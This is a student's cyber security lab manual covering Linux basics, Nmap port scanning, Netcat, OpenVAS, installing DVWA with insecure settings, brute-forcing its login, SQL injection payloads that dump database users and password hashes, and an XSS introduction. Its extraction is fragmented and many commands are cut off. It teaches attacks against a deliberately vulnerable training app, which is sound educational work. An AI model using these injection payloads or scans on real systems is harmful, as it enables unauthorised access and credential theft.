Title: Cyber Security practical
Description: practical set of cyber security for computer science


2150002 - CYBER SECURITY

130020107024

PRACTICAL 1
1
...
UNIX is a
command-driven operating system in which the user has to type in commands at the
computer console in order to operate the computer (“Introduction to Linux”, 2001)
...
It was originally developed in the 1970’s at AT&T as a multitasking
system for minicomputers and mainframes
...


In 1991, Linus Torvalds, a student at the University of Helsinki, sought to create a new
version of UNIX; therefore, he joined forces with a group of programmers to create a new
operating system—Linux
...
As a result, the world now has a powerful, robust, and full-featured
operating system that continues to change and grow
...
Since
the Linux source code is available, anyone can copy, modify, and distribute this software
...
Despite the
command-line origins of Linux, these distributing companies are working to make the
Graphical User Interface (GUI) the primary means of user interface, and thus more user
friendly
...
Although Linux distribution varies, the following list is a summary of what to
expect from any version of Linux:
 File Services: NFS, Samba




Graphics program: image manipulation, retouching, and paint capabilities



Mail server software: SendMail, POP, and IMAP servers



Multimedia tools: Support JPEG, GIF, PNG, TIFF, MPEG, AVI, and QuickTime
video files
...
Linux Distributions

A Linux distribution is an assemblage of software with its own packaging schemes,
defaults and configuration methods
...
Specifically, you may not
modify the Fedora installation and maintain the Fedora name
...
You may
also not then say that your product "contains Fedora" or is an alternate "edition" of
Fedora
...
If you use the
Fedora name in such a manner, you must also note that Fedora is a registered
trademark, and not attempt to confuse users or allude to a nonexistent relationship
between you and the Fedora Project or Red Hat
...

The installation process is simple and does a great job of detecting and automatically
configuring many sound and video card adapters
...


 Debian GNU/Linux: This distribution is one of the oldest and recognized favorites
among advanced technical groups
...



OpenLinux (Caldera): The OpenLinux distribution has shrink-wrapped software
packages that include the first graphical Linux installation
...




Red Hat: Red Hat is the first company to mass market the Linux operating system
...




Slackware: Of all of the surviving Linux distributions, Slackware has been around
the longest
...




SuSE: This distribution derives from Germany
...

As a result, they have a terrific graphical configuration tool called SaX
...
TurboLinux has led the way in
the turnkey installations by providing CD installations exclusive to Server,
Workstation, and Clusters
...
Configuring Your System

After the installation process of the files is complete, the next step is configuring the
system
...
Selecting a language
2
...
Type of software to install


4
...
Adjusting the time settings
6
...
Creating the root password (for the Administrator), as well as the user name and
password for users
8
...
Linux Applications

Once the user is familiar with navigating the KDE GUI, it is time to explore the numerous
applications Linux has to offer
...
Programs for
the SuSE Linux include:


OpenOffice: word processing, spreadsheets, drawing



Adobe Acrobat Reader



Konqueror: The KDE File Manager and Web Browser



Kmail: The KDE Mail Application



Evolution: An Email and Calendar Program



Sound Application, TV, Video, Radio, and Webcam



K3b: The KDE Burning Application



Digital Cameras



Kooka: Scanning Application



Graphics with the GIMP



Shell system

It is useful to note that the Linux operating system allows the user to continue to use old
files that were created in different operating systems
...
SuSE
Linux allows the user to work with old files without difficulty
...
Files, Folders, and Directories


To use the shell efficiently, it is useful to have some knowledge about the file and directory
structures of Linux
...


The place where the entire directory tree begins is called the root directory
...
Root is one of the several users on the Linux system,
which as mentioned before, is a multiuser system
...


The Linux file system is then subdivided into many branches known as subdirectories
...

[Figure: example Linux directory tree starting at the root directory /, with subdirectories such as bin, boot, dev, etc, home, lib, mnt, opt, root, sbin, tmp, usr and var]

Table Overview of Important Directories

Directory            Description
/                    Root directory, starting point of the directory tree
/home                (private) directories of users
/dev                 Device files that represent hardware components
/etc                 Important files for system configuration
/etc/init ... d      Boot scripts
/usr/include         Header files for the C compiler
/usr/include/g++     Header files for the C++ compiler
/usr/share/doc       Various documentation files
/usr/man             System manual pages (man pages)
/usr/src             Source code of system software
/usr/src/linux       Kernel source code
/tmp                 Temporary files
/var/tmp             Large temporary files
/usr                 Contains all application programs
/var                 Configuration files (e ... , those linked from /usr)
/var/log             System log files
/var/adm             System administration data
/lib                 Shared libraries (for dynamically linked programs)
/proc                Process file system
/usr/local           Local, distribution-independent extensions
/opt                 Optional software, larger add-on program packages (such as KDE, GNOME, Netscape
1
...
Set Linux Package Repositories
#

cd /etc/yum
...
d/

#

vim ait
...
3 CONCLUSION

Deciding what operating system is easier to use all depends on the user
...
After actually giving Linux a chance, any user can decide that it is easier
to use than Windows
...
If a user does end up
disliking it, he/she can go back to using Windows
...


Now you have seen that it is possible to set up your system to run more than one operating
system on your computer
...
This will require creating
partitions on your hard disk, which can be done by creating a multi-boot system
...



PRACTICAL – 2
AIM : Port Scanning USING NMAP
2
...
Objectives
1
...

2
...


2
...
Introduction:
 A service is a program that waits inside a loop for a request message from a
client, and acts on the request
...
e
...
Essentially, a port scan consists of sending a message to
each port, one at a time and examining the response received
...

 Port Scanning is one of the most popular among the reconnaissance
techniques attackers use
...
3
...
If vulnerable or insecure services are discovered, the hacker
may be able to exploit these to gain unauthorized access
...
While a complete scan of all these ports may not be
practical, analysis of popular ports should be performed
...

Popular port scanning programs include: Nmap, Netscan Tools, Superscan and Angry
IP Scanner
...
Well Known Ports (from 0 through 1023)
2
...
Dynamic and/or Private Ports (from 49152 through 65535)
...
3
...
TCP and UDP Port Scanning
Remember that TCP offers robust communication and is considered a connection
protocol
...

The TCP header contains a 1-byte field for the flags
...




ACK: The receiver will send an ACK to acknowledge data
...




FIN: Used during a normal shutdown to inform the other host that the sender has
no more data to send
...




PSH: Used to force data delivery without waiting for buffers to fill
...


At the conclusion of communication, TCP terminates the session by using what is
called a four-step shutdown
...



From a scanning standpoint, this means that TCP has the capability to return many
different types of responses to a scanning program
...
Many of these methods are built in
to popular port-scanning tools
...


2
...
2
...
4
...
Nmap is available for Windows and Linux as a GUI and command-line
program
...
It also has the ability to
blind scan and zombie scan, and it enables you to control the speed of the scan from slow to
very fast
...
As you can imagine, such a capability is attractive to the people
who secure networks as well as those who attack networks
...


2
...
1
...
It is easily logged and detected because a full connection is established
...




TCP SYN scan: This type of scan is known as half-open, because a full TCP
connection is not established
...
Open ports reply with a
SYN/ACK; closed ports respond with a RST/ACK
...
This type of scan sends a FIN packet to the target port
...
This technique is usually effective only on Unix devices
...
If the OS has implemented TCP per RFC
793, closed ports will return an RST
...

Closed ports should return an RST
...
4
...
NMAP Installation Step
# yum -y install nmap
# rpm -ivh Zemap-


2
...
3
...
Key among that information is the “interesting ports
table”
...
The state is
either open, filtered, closed, or unfiltered
...
Filtered means that a
firewall, filter, or other network obstacle is blocking the port so that Nmap cannot tell
whether it is open or closed
...
Ports are classified as unfiltered when they
are responsive to Nmap's probes, but Nmap cannot determine whether they are open
or closed
...




The port table may also include software version details when version detection
has been requested
...


2
...
3 Nmap Scan Options


When we use the command line in the Nmap tool instead of the GUI, we need to supply
options with the command to define the type of scan method
...


Scan Option    Name         Notes
-sS            TCP SYN      Stealth scan
-sT            TCP FULL     Full connect
-sF            FIN          No reply from open port
-sN            Null         No flags are set
-sX            Xmas         URG, PUSH, and FIN are set
-sP            Ping         Performs ping
-sU            UDP Scan     Like Null scan
-sA            ACK          Performs an ACK scan
-sI            Idle Scan    Performs zombie scan

2
...
4
...

In this experiment you can use the BackTrack 3 Live CD to run Nmap, or you can install
the Windows version on your machine
...
From Windows
Graphical interface
1
...

2
...

3
...

4
...
The output will be as previously discussed
...
An example of these is shown in Figure 1
Command line
Note that the previous process can also be done using the command-line interface: click
Start, Run and type the following command:
nmap [nmap switches] (IP address of the target)
Example:

Scan a single IP address
nmap hostname
nmap 192
...
1
...
aitindia
...
ashish
...
com



Scanning for a single port on a machine
nmap -p portnumber hostname
nmap -p 192
...
1
...

nmap network ID/subnet-mask
nmap 192
...
1
...

nmap -v hostname
nmap -v 192
...
1
...
168
...
1



Scan a machine for UDP open ports
...
168
...
1


To check which protocols (not ports), such as TCP, UDP, ICMP, etc., are supported
by the remote machine
...

nmap -sO hostname
nmap -sO localhost



To scan a system for operating system and uptime details
nmap -O hostname
nmap -O google
...
1

AIT_CEIT

17

CYBER SECURITY

ENROLLMENT NO

Figure

...
Click Start – All Applications – Network Mapping – choose Zenmap; a GUI similar to
the one in Windows appears, and we use it as in Windows
...


Click Start – All Applications – Terminal – Network Mapping – choose Nmap; the shell
then opens with help output listing the nmap switches, the usage of each one, and examples
...

Introduction :
Netcat is a wonderfully versatile tool which has been dubbed the “hackers' Swiss army
knife”
...
Netcat is designed to be a dependable “backend” device that can be used directly or easily driven by other programs and scripts
...


Its list of features includes port scanning, transferring files, and port listening, and
it can be used as a backdoor
...

Lab Experiment
Requirements:
For this lab we need two machines: the first runs Fedora and the other
runs Windows XP
...

Let's try implementing a simple chat using Netcat
...
From Fedora/Backtrack: we want to listen on port 4444 and accept
incoming connections on this port; type:
nc -lvvp 4444
Check to see that port 4444 is indeed listening using netstat
You will see
listening on [any] 4444
...
From Windows XP: connect to port 4444 on your Backtrack by typing
nc -vv 10
...
136
...
After the connection is established we can start chatting, as shown in Figures 1 and 2
...
This
applies to text and binary files
...
From Backtrack: we'll set up Netcat to listen for and accept the connection
and to redirect any input into a file
...
txt
2
...
txt; then we connect to the
listening Netcat on computer 1 (port 4444) and send the file; type:
C:\>nc -vv 192
...
129
...
txt
3
...

Now, how do I get Netcat to run on the victim machine without remote user
intervention? The answer to this question is simply “remote code execution”
...
For example, attacks such as Buffer Overflows, SQL injection, File
Inclusion, Client Side Attacks, Trojan Horses - all aim to result in “code
execution” on the victim machine
...



PRACTICAL 4
AIM : Vulnerability Scanning with OpenVAS Security Topics
1
...
OpenVAS is the evolution of
a previous project called Nessus, which became a proprietary tool
...


2
...

• Update OpenVAS vulnerability tests
• Create a user for scanning
• Learn to run scans in batch mode from the command-line client

3
...

• Commands preceded with “#” imply that you should be working as root
...
g
...

4
4
...
2

Update the vulnerability database
# openvas-nvt-sync

4
...

Ideally, you will want to only allow scanning on hosts that are under your
control
...

Let’s allow this user to scan hosts in our lab network
...
10
...
/16 default deny type ctrl-D to exit, and then accept
...
1

Operation
Starting the server
# /etc/init
...
Most likely, you will not
be able to run this on the virtual NSRC lab
...

5
...

# cd /home/sysadm
# vi scanme
...
10
...
250
10
...
2
...
etc
...
0
...
1 9390 sysadm nsrc+ws scanme
...
html -T txt -V -x

Alternatively, you can export into prettier HTML format with:
# openvas-client -q 127
...
0
...
txt \
openvas-output
...


5
...

• Create a git repository
• Add a cron job to scan hosts periodically (e
...
once a month)
• Use -T txt or -T xml report format
• Update the repository after each run
• Add a post-commit hook on Git to generate e-mails with different ends
...
Its main goals are to be an aid for security professionals to test their skills and
tools in a legal environment, help web developers better understand the processes of
securing web applications
...


Step 1
Install MySQL server by entering the following command:
root@ashish:~# yum -y install mysql mysql-server
When prompted, create a password for MySQL
...
We’re going to need it later
...
com/RandomStorm/DVWA/archive/v1
...
8
...
0
...
zip
You should now have a directory titled, “DVWA-1
...
8″
...
We can delete the
v1
...
8
...
0
...
0
...
zip
root@ashish:/var/www/html# mv DVWA-1
...
8 dvwa
The DVWA-1
...
8 directory should now be titled “dvwa”

Step 6
Open the DVWA database connection script by entering the following command:
root@ashish:/var/www/html# vim dvwa/config/config
...
php

Step 7
Now we need to add our MySQL password to the DVWA database connection script
...

Example:
$_DVWA[ 'db_password' ] = 'mysqlpassword';
When you’re finished adding your password, press “control” and “x” to end the editing
session
...
Then press enter to save the file
...
Join me if you want…
root@ashish:/var/www/html# cd \
Open the Apache php
...
ini
Step 9
Find the following line:
allow_url_include = Off

and replace “Off” with “On”
Example:
allow_url_include = On
Tip:
An easy way to find a string of text is to open the search prompt by pressing “control” and
“w”
Then enter the search term and press enter
...

Then press “y” to confirm your changes
...


Step 10
Change the permissions by entering the following command:
root@ashish:~# chmod -R 777 /var/www/html/dvwa
To start the MySQL service:
ps ax | grep mysql
systemctl enable mysql
systemctl start mysql
systemctl status mysql

Step 11
Log into MySQL and create a database for DVWA by entering the following commands:
root@ashish:~# mysql -u root -p
Enter Password: [your mysql password]
mysql> create database dvwa;
mysql> exit

Step 12
Open the apache
...
conf

Step 13
Move to the bottom of the file and add the following line:
ServerName localhost

When you’re finished adding the new line, press “control” and “x” to end the editing
session
...
Then press enter to save the file
...
php
Example:
http://10
...
7
...
php
and click the button that says “Create / Reset Database”

Step 16
Navigate to:
http://localhost/dvwa
Example:
http://10
...
7
...
For example, a simple brute-force attack may have a dictionary of all words or commonly used passwords and cycle
through those words until it gains access to the account
...
Due to
the number of possible combinations of letters, numbers, and symbols, a brute force attack
can take a long time to complete
...



The first challenge of DVWA is how to log in to it
...
Here we
will use brute force, with the WebCruiser Web Vulnerability Scanner brute-force tool
...
submit
...
1

Fig 5
...
Note that
there is a “Bruter” button; click it to switch to the Bruter tool
...
The dictionary files are located in the
same directory as WebCruiserWVS
...
Click “Go”
to start the guessing process; the results will be listed in the window
...



Fig 5
...
An SQL query is a request for some action to be performed on a database
...
Basic Injection
Instructions:
1
...

2
...

3
...

Notes(FYI):
Below is the PHP select statement that we will be exploiting,
specifically $id
...
SQL Injection (Blind)
2
...
Input the below text into the User ID Textbox (See Picture)
...
Click Submit
Notes(FYI):
In this scenario, we are saying display all records that are
false and all records that are true
...

'0'='0' - Is equal to true, because 0 will always equal
0
...
Display Database Version
Instructions:
1
...

%' or 0=0 union select null, version() #
2
...
1
...

This is the version of the mysql database
...
Display Database User
Instructions:
1
...

%' or 0=0 union select null, user() #
Notes(FYI):
Notice in the last displayed line, root@localhost is
displayed in the surname
...

5
...
Input the below text into the User ID Textbox (See Picture)
...

This is the name of the database
...
Display all tables in information_schema
Instructions:
1
...

%' and 1=0 union select null, table_name from
information_schema
...
Click Submit
Notes(FYI):
Now we are displaying all the tables in the
information_schema database
...

7
...
Input the below text into the User ID Textbox (See Picture)
...
tables where table_name like 'user%'#
2
...

8
...
Input the below text into the User ID Textbox (See Picture)
...
columns where table_name = 'users' #
2
...

Notice there are a user_id, first_name, last_name, user and
Password column
...
Display all the columns field contents in the information_schema user table
Instructions:
1
...

%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password)
from users #
2
...



Practical 7
AIM : XSS using DVWA
...




XSS enables attackers to inject client-side script into Web pages viewed by other users
...




In addition, the attacker can send input (e
...
, username, password, session ID, etc)
which can be later captured by an external script
...
Because it thinks the script came from a trusted source, the malicious
script can access any cookies, session tokens, or other sensitive information retained by
the browser and used with that site
...


1
...
For example, the attacker could send the victim a misleading email with
a link containing malicious JavaScript
...
The
malicious JavaScript is then reflected back to the victim’s browser, where it is executed
in the context of the victim’s browser

Fig 1
...
Persistent XSS
Consider a web application that allows users to enter a username that is displayed on
each user’s profile page
...
A
malicious user notices that the web application fails to sanitize the username field and
inputs malicious JavaScript code as part of their username
...


Fig 2
...
3
and as shown in Fig 1 try to write
to the box, and submit it
...

Fig